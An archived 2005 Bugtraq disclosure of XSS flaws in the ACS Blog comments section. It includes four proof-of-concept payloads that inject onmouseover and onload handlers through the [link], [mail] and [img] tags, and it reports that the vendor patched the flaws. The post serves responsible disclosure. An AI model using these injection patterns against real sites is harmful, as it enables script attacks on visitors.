Multiple XSS vulnerabilities in ACS Blog

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple XSS vulnerabilities in ACS Blog
From: Dan Crowley <dan.crowley@xxxxxxxxx>
Date: Mon, 28 Mar 2005 18:15:34 -0500
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=OFD4Ztd+oFSmpGcIOJl4bzgMa+IC4aCrWXjFuP+1cVzseB3oPwjKrdScOwP+wJ0Zm9vqWxXrcQLJEXkMpyYM5vYGTZfWzQ6J0YGpUjcKzoh75WiGYCGsplw+sIT1jpYNs8pyL2H/FXlI6YBCAkVzmNB4SUl8LunI3IrW55/PZkY=
In-reply-to: <42488882.4e97a911.58c6.ffffbb95SMTPIN_ADDED@xxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <42488882.4e97a911.58c6.ffffbb95SMTPIN_ADDED@xxxxxxxxxxxx>
Reply-to: Dan Crowley <dan.crowley@xxxxxxxxx>

These vulnerabilities have been tested on the latest version of ACS
Blog. (v1.1.1)

In the comments section of ACS Blog, it is possible to execute an XSS
attack through the [link], [mail], and [img] tags, due to lack of
filtering of single quotes and spaces inside the tags.

Examples/PoCs:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")'
o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq@xxxxxxxxxxxxxxxxx' onmouseover='alert("XSS
vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='alert("XSS
vulnerability")' o='[/img]

[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

----------
Vendor responded within 2 hours of notification, notified users with
the security alert on its main page, and patched the vulnerabilities
within another couple of hours.
----------

Cheers,
Dan

Prev by Date: Re: DoS of LAN via D-Link switches
Next by Date: Multiple phpCoin Vulnerabilities
Previous by thread: Multiple XSS vulnerabilities in ACS Blog
Next by thread: Multiple XSS issues in Sun AnswerBook2
Index(es):
- Date
- Thread